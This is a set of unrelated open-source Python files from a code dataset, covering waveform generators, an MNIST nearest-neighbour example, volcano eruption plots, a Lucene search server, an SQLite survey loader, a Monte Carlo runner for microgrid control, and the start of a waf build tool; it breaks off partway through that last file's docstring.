","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej8/hito1_ej8_5d4bd55f38c5fe5eb0487ca5bf491359.py","file_name":"hito1_ej8_5d4bd55f38c5fe5eb0487ca5bf491359.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12737595938","text":"# wavefns.py\n#By Tsering Tashi and Ryusei Mikami\n#(It has the information about various standard form of wave such as squarewave,\n#trianglewave, sawtoothwave, and whitenoise)\n\"\"\"Simple periodic waveform functions.\n\n A \"standard\" wave function (such as sin) is a periodic function with\n period equal to 2*pi (also known as tau) and a amplitude of 1.\n\"\"\"\nimport math\nimport random\n\ndef sinewave(t):\n \"\"\" Standard periodic sine wave generator\n pre: t >= 0\n post returns value of standard sine wave at time t\n (0 at t=0, 1 at t= pi/2, 0 at pi, -1 at 1.5*pi, 0 at 2*pi)\n \"\"\"\n\n return math.sin(t)\n\ndef squarewave(t):\n \"\"\" Standard periodic square wave generator.\n\n pre: t >= 0\n post: returns value of standard square wave at time t.\n (1.0 for 0 <= t < pi and -1.0 for pi <= t < 2*pi)\n \"\"\"\n phase = t % math.tau\n if phase < math.pi:\n return 1\n else:\n return -1\n\n\ndef trianglewave(t):\n \"\"\" Standard periodic triangle wave generator.\n\n pre: t >= 0\n post: returns value of standard triangle wave at time t.\n (0.0 at t=0, 1.0 at t=pi/2, 0.0 at t=pi, -1.0 at t=1.5*pi)\n \"\"\"\n phase = t%math.tau\n if 0 <= phase < math.pi / 2:\n return (0 + phase) * 2/math.pi\n elif math.pi / 2 <= phase < (3*math.pi) / 2:\n return 1 + (phase - math.pi/2) * -2/math.pi\n elif (3*math.pi) / 2 <= phase <= math.tau:\n return -1 + (phase - 1.5 * math.pi) * 2/math.pi\n \n \n\ndef sawtoothwave(t):\n \"\"\" Standard periodic sawtooth wave generator.\n\n pre: t >= 0\n post: returns value of standard sawtooth wave at time t.\n (0.0 at t=0, rising to 1 near t=pi, -1.0 at t=pi, rising to 0.0 at t=pi)\n \"\"\"\n phase = t % 
math.tau\n if 0 <= phase < math.pi:\n return 0 + (phase * 1 / math.pi)\n elif math.pi<= phase < 2*math.pi:\n return -1 + (phase - math.pi) * 1/math.pi \n\n\ndef whitenoise(t):\n \"\"\" White noise \"wave\" generator\n\n post: returns random float value in range -1 to 1\n \"\"\"\n \n return (2 * random.random()) - 1\n\n\n\n######################################################################\n# The rest of this is for testing purposes. No changes needed.\n# Requires: graphics needed to visualize the wave forms\n\ndef _plot(wavefn):\n # test function plots 2 cycles of wavefunction\n win = GraphWin(wavefn.__name__, 600, 200)\n win.setCoords(0, -1, 2*math.tau, 1)\n Line(Point(0, 0), Point(2*math.tau, 0)).draw(win)\n npoints = 300\n dt = 2*math.tau/npoints\n t = 0\n last = Point(t, wavefn(t))\n for i in range(npoints):\n t += dt\n p = Point(t, wavefn(t))\n segment = Line(last, p).draw(win)\n segment.setFill(\"red\")\n segment.setWidth(2)\n last = p\n win.getMouse()\n win.close()\n\n\nif __name__ == \"__main__\":\n from graphics import *\n for wf in [sinewave, squarewave, trianglewave, sawtoothwave, whitenoise]:\n _plot(wf)\n","repo_name":"TibetanPythoner/SoundWave","sub_path":"wavefns.py","file_name":"wavefns.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44682553744","text":"\"\"\"\nA nearest neighbor learning algorithm example using TensorFlow library.\nThis example is using the MNIST database of handwritten digits\n(http://yann.lecun.com/exdb/mnist/)\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nimport operator\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../../mnist/MNIST-data/\", one_hot=True)\n\nXtr, Ytr = mnist.train.next_batch(5000)\nXte, Yte = mnist.test.next_batch(200)\n\nxtr = tf.placeholder(\"float\", [None, 784])\nxte = tf.placeholder(\"float\", [784])\n\ndistance = tf.reduce_sum(tf.abs(tf.add(xtr, tf.negative(xte))), reduction_indices=1)\nsortedDistIndices = tf.nn.top_k(-distance, k=3).indices\nminDistance = tf.gather(distance, sortedDistIndices)\n\n# K-means\nk_accuracy = 0.\nwith tf.Session() as sess:\n for i in range(len(Xte)):\n\n indices = sess.run(sortedDistIndices, feed_dict={xtr: Xtr, xte: Xte[i]})\n\n classCount = {}\n for index in range(len(indices)):\n # trueClass = np.argmax(Yte[i])\n predictionClass = np.argmax(Ytr[indices[index]])\n classCount[predictionClass] = classCount.get(predictionClass, 0) + 1\n print(\"Result\", index, \"Prediction:\", predictionClass,\n \"True Class:\", np.argmax(Yte[i]))\n\n pred = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)[0][0]\n if pred == np.argmax(Yte[i]):\n k_accuracy += 1. / len(Xte)\n\n print(\"Done!\")\n print(\"K_Accuracy:\", k_accuracy)\n\npred = tf.arg_min(distance, 0)\n\naccuracy = 0.\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n\n for i in range(len(Xte)):\n nn_index = sess.run(pred, feed_dict={xtr: Xtr, xte: Xte[i]})\n print(\"Test\", i, \"Prediction:\", np.argmax(Ytr[nn_index]),\n \"True Class:\", np.argmax(Yte[i]))\n if np.argmax(Ytr[nn_index]) == np.argmax(Yte[i]):\n accuracy += 1. 
/ len(Xte)\n\n print(\"Done!\")\n print(\"Accuracy:\", accuracy)\n\nprint(\"Compare:\", \"k_accuracy\", k_accuracy, \"accuracy\", accuracy)\n","repo_name":"jinkg/NeuralNetworkdsAndDeepLearning","sub_path":"TensorflowStudy/TensorFlowExamples/2_BasicModels/nearest_neighbor.py","file_name":"nearest_neighbor.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22343429913","text":"# Start to use pandas\nimport numpy as np\nfrom numpy.lib.function_base import append\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Error meet when import matplotlib: ModuleNotFoundError: No module named 'matplotlib'\n# So I tried to install it, but got an error\n# Input: pip install matplotlib\n# Output: Requirement already satisfied: futures in /Users/Longfei/Library/Python/2.7/lib/python/site-packages (from tornado->matplotlib) (3.3.0)\n\ndef xaxis_generation():\n \"\"\"\n Generate the common used xaxis for the following three diagrams\n return: A list of year from 1700 to 2021\n rtype: List\n \"\"\"\n xaxis = []\n for i in range(1700, 2021):\n xaxis.append(i)\n return xaxis\n\n\ndef Number_Eruptions(df, xaxis):\n \"\"\"\n Show the trend of number of eruptions verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of number of eruptions over time\n rtype: Graph\n \"\"\"\n NumErup = []\n for i in xaxis:\n count = 0\n for x in df['Start Year']:\n if i == x:\n count = count + 1\n NumErup.append(count)\n\n plt.cla()\n plt.plot(xaxis, NumErup)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Number of Eruptions\")\n plt.title(\"The relationship between Year and Number of Eruptions\")\n plt.savefig('images/Number of Eruptions over Year.png')\n\n\ndef Eruption_Duration(df, xaxis):\n \"\"\"\n Show the trend of eruptions duration verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of eruptions duration over time\n rtype: Graph\n \"\"\"\n ErupDur_with_Outliner = []\n ErupDur_without_Outliner = []\n for i in xaxis:\n dur_with_Outliner = []\n dur_without_Outliner = []\n row = 0\n for x in df['Start Year']:\n if i == x:\n day = df.loc[row, 'Eruption Duration (d)']\n if day < 10000:\n dur_with_Outliner.append(day)\n dur_without_Outliner.append(day)\n else:\n dur_with_Outliner.append(day)\n row = row + 1\n if sum(dur_with_Outliner) == 0:\n ErupDur_with_Outliner.append(0)\n else:\n ErupDur_with_Outliner.append(np.mean(dur_with_Outliner))\n if sum(dur_without_Outliner) == 0:\n ErupDur_without_Outliner.append(0)\n else:\n ErupDur_without_Outliner.append(np.mean(dur_without_Outliner))\n\n plt.cla()\n plt.plot(xaxis, ErupDur_with_Outliner)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Eruption Durations (d)\")\n plt.title(\n \"The relationship between Year and Eruption Durations (with outliners)\")\n plt.savefig('images/Eruptions Durations over Year with outliners.png')\n\n plt.cla()\n plt.plot(xaxis, ErupDur_without_Outliner)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Eruption Durations (d)\")\n plt.title(\n \"The relationship between Year and Eruption Durations (without outliners)\")\n plt.savefig('images/Eruptions Durations over Year without outliners.png')\n\n\ndef VEI(df, xaxis):\n \"\"\"\n Show the trend of volcano eruption index (VEI) verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of VEI over time\n rtype: Graph\n \"\"\"\n VEI = []\n for i in xaxis:\n index = 
[]\n row = 0\n\n for x in df['Start Year']:\n if i == x:\n index.append(df.loc[row, 'Volcano Eruption Index (VEI)'])\n row = row + 1\n if sum(index) == 0:\n VEI.append(0)\n else:\n VEI.append(np.mean(index))\n\n plt.cla()\n plt.plot(xaxis, VEI)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Volcano Eruption Index (VEI)\")\n plt.title(\"The relationship between Year and VEI\")\n plt.savefig('images/VEI over Year.png')\n\n\nif __name__ == '__main__':\n cleaned_file = \"Cleaned_GVP_Eruption_Results.xlsx\"\n df = pd.read_excel(cleaned_file)\n df.rename(columns={'Sta_yr': 'Start Year', 'Erup_dur': 'Eruption Duration (d)',\n 'VEI': 'Volcano Eruption Index (VEI)'}, inplace=True)\n # Basic stat\n print(df.describe())\n # Outliners\n df.plot.box(subplots=True)\n plt.show()\n # No need to drop, reasonable outliners\n print(df.loc[df['Eruption Duration (d)'] > 10000])\n # Plot graph to anwer the three questions\n Year = xaxis_generation()\n Number_Eruptions(df, Year)\n Eruption_Duration(df, Year)\n VEI(df, Year)\n","repo_name":"Longfei-CLF/coursework-1-Longfei-CLF","sub_path":"data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27648206712","text":"class Parks():\n \"\"\"Defining the parks class\"\"\"\n def __init__(self, id, name, history, city, state, longitude, latitude):\n self.id = id\n self.name = name\n self.history = history\n self.city = city\n self.state = state\n self.longitude = longitude\n self.latitude = latitude\n","repo_name":"nss-day-cohort-60/national-parks-api","sub_path":"models/parks.py","file_name":"parks.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"9753385142","text":"from db import MysqlClient\r\nfrom indexer import Indexer\r\nfrom server import MyWebServer\r\nimport lucene\r\nfrom org.apache.lucene.store import NIOFSDirectory\r\nfrom org.apache.lucene.index import DirectoryReader\r\nfrom http.server import HTTPServer\r\nimport time, os, _thread\r\nfrom java.nio.file import Paths\r\nfrom utils import INTERVAL\r\n\r\nhostName = \"0.0.0.0\"\r\nserverPort = 8080\r\nINDEXDIR = os.environ.get('INDEXDIR') if os.environ.get(\r\n 'INDEXDIR') else \"./index\"\r\nSHOULD_SERVE = True\r\n\r\ndef indexing_and_update():\r\n vm_env = lucene.getVMEnv()\r\n vm_env.attachCurrentThread()\r\n directory = NIOFSDirectory(Paths.get(INDEXDIR))\r\n my_directory_reader = DirectoryReader.open(directory)\r\n while True:\r\n db = MysqlClient()\r\n db.take_and_index()\r\n db.close()\r\n del db\r\n my_new_directory_reader = DirectoryReader.openIfChanged(my_directory_reader)\r\n if my_new_directory_reader: # 有更新\r\n my_directory_reader = my_new_directory_reader\r\n MyWebServer.change_retriever(my_directory_reader)\r\n time.sleep(INTERVAL)\r\n\r\n\r\ndef start_serve(webServer):\r\n try:\r\n webServer.serve_forever()\r\n except KeyboardInterrupt:\r\n pass\r\n webServer.server_close()\r\n print(\"Server stopped.\")\r\n\r\nif __name__ == \"__main__\":\r\n # start JVM\r\n if not lucene.getVMEnv():\r\n lucene.initVM()\r\n print(\"started VM\")\r\n\r\n # indexing & initialize server\r\n _thread.start_new_thread(indexing_and_update,())\r\n webServer = HTTPServer((hostName, serverPort), MyWebServer)\r\n print(\"Server created http://%s:%s\" % (hostName, serverPort))\r\n \r\n 
start_serve(webServer)\r\n","repo_name":"fj4444/pylucene-of-C00kie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72585014970","text":"ben_matrix = []\nfor i in range(3):\n #append an empty list\n ben_matrix.append([])\n\n #populate the empty list\n for j in range(6):\n ben_matrix[i].append(j)\n\nprint(ben_matrix)\n\n#another version using nested list comprehension\nsteve_matrix = [[j for j in range(6)] for i in range(3)]\nprint(steve_matrix)\n","repo_name":"bendeleon1226/DailyPython","sub_path":"022_nested_list_comprehension.py","file_name":"022_nested_list_comprehension.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69839634809","text":"import sqlite3\n\nfrom flask import Flask, render_template\nfrom csv import reader\n\nimport util\n\napp = Flask(__name__)\n\ndb = sqlite3.connect('hw5.db')\n\ndb.execute('''DROP TABLE MODEL''')\n\n\ndb.execute('''CREATE TABLE MODEL(\n [index] Integer PRIMARY KEY,\n [What country do you live in?] text,\n [How old are you?] Integer,\n [What is your gender?] text,\n [To what extent do you feel FEAR due to the coronavirus?] text,\n [To what extent do you feel ANXIOUS due to the coronavirus?] text,\n [To what extent do you feel ANGRY due to the coronavirus?] text,\n [To what extent do you feel HAPPY due to the coronavirus?] text,\n [To what extent do you feel SAD due to the coronavirus?] text,\n [Which emotion is having the biggest impact on you?] text, \n [What makes you feel that way?] text,\n [What brings you the most meaning during the coronavirus outbreak?] text,\n [What is your occupation?] 
text)''')\n\nwith open('t.csv', 'r') as read_obj:\n csv_reader = reader(read_obj)\n next(csv_reader)\n for row in csv_reader:\n item = row[0]\n item2 = row[1]\n item3 = row[2]\n item4 = row[3]\n item5 = row[4]\n item6 = row[5]\n item7 = row[6]\n item8 = row[7]\n item9 = row[8].decode('utf-8')\n item10 = row[9].decode('utf-8')\n item11 = row[10].decode('utf-8')\n item12 = row[11].decode('utf-8')\n item13 = row[12].decode('utf-8')\n db.execute('''INSERT INTO MODEL('index', 'What country do you live in?', 'How old are you?', 'What is your gender?', 'To what extent do you feel FEAR due to the coronavirus?', 'To what extent do you feel ANXIOUS due to the coronavirus?', 'To what extent do you feel ANGRY due to the coronavirus?', 'To what extent do you feel HAPPY due to the coronavirus?', 'To what extent do you feel SAD due to the coronavirus?', 'Which emotion is having the biggest impact on you?', 'What makes you feel that way?', 'What brings you the most meaning during the coronavirus outbreak?', 'What is your occupation?')\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)''',\n (item, item2, item3, item4, item5, item6, item7, item8, item9, item10, item11, item12, item13))\n db.commit()\n\n\ndatabaseList = list()\n\n\ndef storedatabase(db):\n cursorDB = db.cursor()\n cursorDB.execute('''SELECT * FROM MODEL''')\n rows = cursorDB.fetchall()\n\n for row in rows:\n databaseList.append(row)\n\n\nstep1group1List = list()\n\n\ndef step1group1(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for row in rows:\n step1group1List.append(row)\n\n\nstep1group2List = list()\n\n\ndef step1group2(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for row in rows:\n step1group2List.append(row)\n\n\ndef step1group3(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for row in rows:\n print(row)\n\n\ndef step1group4(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for row in rows:\n print(row)\n\n\ncountryList = [\"USA\", \"Switzerland\", \"Romania\", \"UK\", \"Hong Kong\", \"Columbia\", \"Canada\", \"Australia\", \"France\",\n \"Germany\", \"Cyprus\", \"Rwanda\", \"Israel\", \"Portugal\", \"Ireland\", \"New Zealand\", \"China\", \"Palestine\",\n \"Spain\"]\nlistOfList = list()\nlistOfList2 = list()\nlistOfList3 = list()\nlistOfList4 = list()\n\n\ndef step2group1(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList.append(emptyList)\n\n\ndef step2group2(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n 
emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList2.append(emptyList)\n\n\ndef step2group3(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList3.append(emptyList)\n\n\ndef step2group4(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList4.append(emptyList)\n\n\nanotherList = list()\n\n\ndef step3group1():\n for list1 in listOfList:\n if len(list1) > 10:\n labels = util.cluster_user_data(list1)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list1, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group2():\n for list2 in listOfList2:\n if len(list2) > 10:\n labels = util.cluster_user_data(list2)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list2, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group3():\n for list3 in listOfList3:\n if len(list3) > 10:\n labels = util.cluster_user_data(list3)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list3, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group4():\n for list4 in listOfList4:\n if len(list4) > 10:\n labels = util.cluster_user_data(list4)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list4, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\n# the data should be obtained from your db\n\nstoredatabase(db)\nstep1group1(db)\nstep1group2(db)\nstep3group4()\nstep3group3()\nstep3group2()\nprint(listOfList3)\n","repo_name":"younglane/CSCI4710_6710_Group17","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9673091335","text":"def fillUtil(res, curr, n):\n # if we have reached curr as 0, then that means that we have successfully\n # placed all numbers from 0 to n. So, we are finished\n if curr == 0: return True\n\n # iterate through all possible positions to place the current number\n for i in range(2*n - curr - 1):\n # if we haven't filled in the current spot, nor the corresponding spot\n # that is \"curr\" distance away (which it has to be because that is in\n # the definition of the problem, then try filling it in\n if res[i] == 0 and res[i + curr + 1] == 0:\n # fill in the empty spots with the current number\n res[i] = res[i + curr + 1] = curr\n\n # if it is possible to fill in these spots, then if we recurse\n # downwards, it will work all the way through. 
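(illustrative aside, added: for n = 3 one valid output of this backtracking is [3, 1, 2, 1, 3, 2]; the two copies of each value k land at indices i and i + k + 1, exactly the pair res[i] and res[i + curr + 1] filled above.)\n            # 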
so, return True,\n # since we have found a valid placement strategy\n if fillUtil(res, curr-1, n): return True\n\n # if the above line didn't work, then that means that our current\n # placement of the numbers must not have been right. Thus, we should\n # continue to iterate through the rest of the possible positions.\n\n # we must now 0 out the current positions so that they can be used for\n # future iterations (note that because of the if statement on top, we\n # will never walk on the toes of a recursive call further up that wrote\n # some indices, because we only test out spots that have not yet been\n # written to.\n res[i] = res[i + curr + 1] = 0\n return False\n\ndef main():\n n = 7\n res = [0] * (2 * n)\n if fillUtil(res, n, n):\n print(res)\n else:\n print('impossible')\n\nmain()\n","repo_name":"bensenberner/ctci","sub_path":"strings_arrays/fillArraySpecificWay.py","file_name":"fillArraySpecificWay.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11029860194","text":"\"\"\"clean_data.py\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\n\ndef clean_up_data():\n\tloansData = pd.read_csv('https://spark-public.s3.amazonaws.com/dataanalysis/loansData.csv')\n\tloansData.dropna(inplace=True)\n\n\t# remove '%' from Interest.Rate and Debt.To.Income.Ratio column\n\tloansData['Interest.Rate'] = loansData['Interest.Rate'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\n\tloansData['Debt.To.Income.Ratio'] = loansData['Debt.To.Income.Ratio'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\n\n\t# remove ' months' from Loan.Length column\n\tloansData['Loan.Length'] = loansData['Loan.Length'].map(lambda x: int(x.rstrip(' months')))\n\n\t# convert FICO scores into a numerical value, and save it in a new column titled 'FICO.Score'\n\tloansData['FICO.Score'] = loansData['FICO.Range'].map(lambda x: (float(x.split('-')[0])))\n\n\t# confirm values are in float or int format instead of strings\n\tloansData['Interest.Rate'] = loansData['Interest.Rate'].map(lambda x: float(x))\n\tloansData['Amount.Requested'] = loansData['Amount.Requested'].map(lambda x: int(x))\n\n\treturn loansData","repo_name":"eddiejew/thinkfulprojects","sub_path":"Unit2/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12775089152","text":"import numpy as np\nfrom typing import Dict, Any\nfrom tqdm import tqdm\nfrom openmodelica_microgrid_gym.agents.episodic import EpisodicLearnerAgent\nfrom openmodelica_microgrid_gym.env import ModelicaEnv\n\n\nclass MonteCarloRunner:\n \"\"\"\n This class will execute an agent on the environment.\n It handles communication between agent and environment and handles the execution of multiple epochs\n Additionally to runner, the Monte-Carlo runner has an additional loop to perform n_MC experiments using one\n (controller) parameter set before update the (controller) parameters.\n Therefore, the agent.observe function is used.\n Inside the MC-loop the observe function is called with terminated = False to only update the return.\n The return is stored in an array at the end of the MC-loop.\n After finishing the MC-loop, the average of the return-array is used to update the (controller) parameters.\n Therefore, the agent-observe function is called with terminated = True\n \"\"\"\n\n def 
__init__(self, agent: EpisodicLearnerAgent, env: ModelicaEnv):\n \"\"\"\n\n :param agent: Agent that acts on the environment\n :param env: Environment tha Agent acts on\n \"\"\"\n self.env = env\n self.agent = agent\n self.agent.env = env\n self.run_data = dict() # type: Dict[str,Any]\n \"\"\"\n Dictionary storing information about the experiment.\n\n - \"best_env_plt\": environment best plots\n - \"best_episode_idx\": index of best episode\n - \"agent_plt\": last agent plot\n \"\"\"\n\n def run(self, n_episodes: int = 10, n_mc: int = 5, visualise: bool = False, prepare_mc_experiment=lambda: True,\n return_gradient_extend: bool = False):\n \"\"\"\n Trains/executes the agent on the environment for a number of epochs\n\n :param n_episodes: number of epochs to play\n :param n_mc: number of Monte-Carlo experiments using the same parameter set before updating the latter\n :param visualise: turns on visualization of the environment\n :param prepare_mc_experiment: prepares experiment by resetting stochastic components\n :param return_gradient_extend: calculates gradient extension for return if return_gradient_extend\n \"\"\"\n t = np.linspace(0, self.env.max_episode_steps * self.env.net.ts, self.env.max_episode_steps + 1)\n self.agent.reset()\n self.env.history.cols = self.env.history.structured_cols(None) + self.agent.measurement_cols\n self.agent.obs_varnames = self.env.history.cols\n self.env.measure = self.agent.measure\n\n initial_performance_mc = np.zeros(n_mc)\n performance_mc = np.zeros(n_mc)\n\n if not visualise:\n self.env.viz_mode = None\n agent_fig = None\n\n for i in tqdm(range(n_episodes), desc='episodes', unit='epoch'):\n done, r = False, None\n np.random.seed(0)\n for m in tqdm(range(n_mc), desc='monte_carlo_run', unit='epoch', leave=False):\n prepare_mc_experiment() # reset stoch components\n\n r_vec = np.zeros(self.env.max_episode_steps)\n\n obs = self.env.reset()\n\n for p in tqdm(range(self.env.max_episode_steps), desc='steps', unit='step', leave=False):\n self.agent.observe(r, False)\n act = self.agent.act(obs)\n obs, r, done, info = self.env.step(act)\n r_vec[p] = r\n self.env.render()\n if done:\n self.agent.observe(r, False)\n\n if return_gradient_extend:\n w = self.env.history['master.CVVd'].values\n w1 = self.env.history['master.CVVq'].values\n w2 = self.env.history['master.CVV0'].values\n v = self.env.history['master.SPVd'].values\n\n SP_sattle = (abs(w - v) < v * 0.12).astype(int) # 0.12 -> +-20V setpoint\n\n dw = np.gradient(w)\n dw1 = np.gradient(w1)\n dw2 = np.gradient(w2)\n\n dev_return = (np.mean(abs(SP_sattle * dw)) + np.mean(abs(SP_sattle * dw1)) + np.mean(\n abs(SP_sattle * dw2)))\n else:\n dev_return = 0\n print('NO DEV RETURN!!!!')\n\n dev_fac = 5 # 3\n\n print(self.agent.episode_return)\n print(dev_return)\n\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n if m == 0 and i == 0:\n self.agent.initial_performance = self.agent.episode_return - dev_return * dev_fac\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (\n self.agent.initial_performance - self.agent.min_performance) # instead of perf/initial_perf\n self.agent.last_best_performance = self.agent.performance\n self.agent.last_worst_performance = self.agent.performance\n\n self.agent.best_episode = self.agent.history.df.shape[0]\n self.agent.last_best_performance = self.agent.performance\n 
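# (added annotation, not from the original code: the performance computed above is (J - J_min) / (J_initial - J_min), so the very first episode scores 1.0; e.g. with J_initial = -100 and J_min = -400, an episode return of -250 normalizes to 150 / 300 = 0.5)\n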
self.agent.worst_episode = self.agent.history.df.shape[0]\n self.agent.last_worst_performance = self.agent.performance\n\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n performance_mc[m] = self.agent.performance\n initial_performance_mc[m] = self.agent.episode_return\n # set iterations and episode return = 0\n self.agent.prepare_episode()\n\n break\n\n _, env_fig = self.env.close()\n\n # vor break?\n if (m == 0 and i == 0): # and self.agent.has_improved:\n self.run_data['best_env_plt'] = env_fig\n self.run_data['best_episode_idx'] = i\n self.agent.last_best_performance = self.agent.performance\n\n if (m == 0 and i == 0): # and self.agent.has_worsened:\n self.run_data['worst_env_plt'] = env_fig\n self.run_data['worst_episode_idx'] = i\n self.agent.last_worst_performance = self.agent.performance\n\n if i == 0:\n # performance was normalized to first run -> use average of first episode so that J_initial for first\n # is 1\n eps_ret = performance_mc * (\n self.agent.initial_performance - self.agent.min_performance) + self.agent.min_performance\n self.agent.initial_performance = np.mean(eps_ret)\n performance_mc = (eps_ret - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n self.agent.performance = np.mean(performance_mc)\n self.agent.update_params()\n\n if visualise:\n agent_fig = self.agent.render()\n\n self.run_data['last_agent_plt'] = agent_fig\n","repo_name":"upb-lea/openmodelica-microgrid-gym","sub_path":"experiments/model_validation/execution/monte_carlo_runner.py","file_name":"monte_carlo_runner.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"77"} +{"seq_id":"3209473323","text":"#!/usr/bin/python\n\n\"\"\"\nCreate and install GObject Introspection data.\n\nThe functions herein center around a feature called 'gir' which scans source\nfiles for GObject Introspection data and compiles a Typelib. It and all\nmandatory parameters can simply be added to a generator creating a shared\nlibrary from c sources or used to create a separate task generator that\nreferences the target library.\n\n def options(opt):\n opt.load(\"gir\")\n\n def configure(cnf):\n cnf.load(\"gir\")\n cnf.check_gir(\"GLib-2.0\",\n store=\"GLIB\") # defaults to upper cased package name\n\n def build(bld):\n bld(features=\"c cshlib gir\",\n source=\"object.c\", # main code to be compiled\n target=\"object\",\n scan=\"object.h\", # header files for the g-ir-scanner\n include=\"GLIB\", # GIR repositories to depend upon\n namespace=\"Object\", # by default capitalized first header name\n version=1) # defaults to 0\n\nor\n\n bld(features=\"c cshlib\", # library compilation\n source=\"object.c\", target=\"object\", use=\"GLIB2\")\n bld(features=\"gir\",\n lib=\"object\", # library to introspect\n scan=\"object.h\") # header files to scan\n\nIf the scan parameter is left out, one header is assumed with the 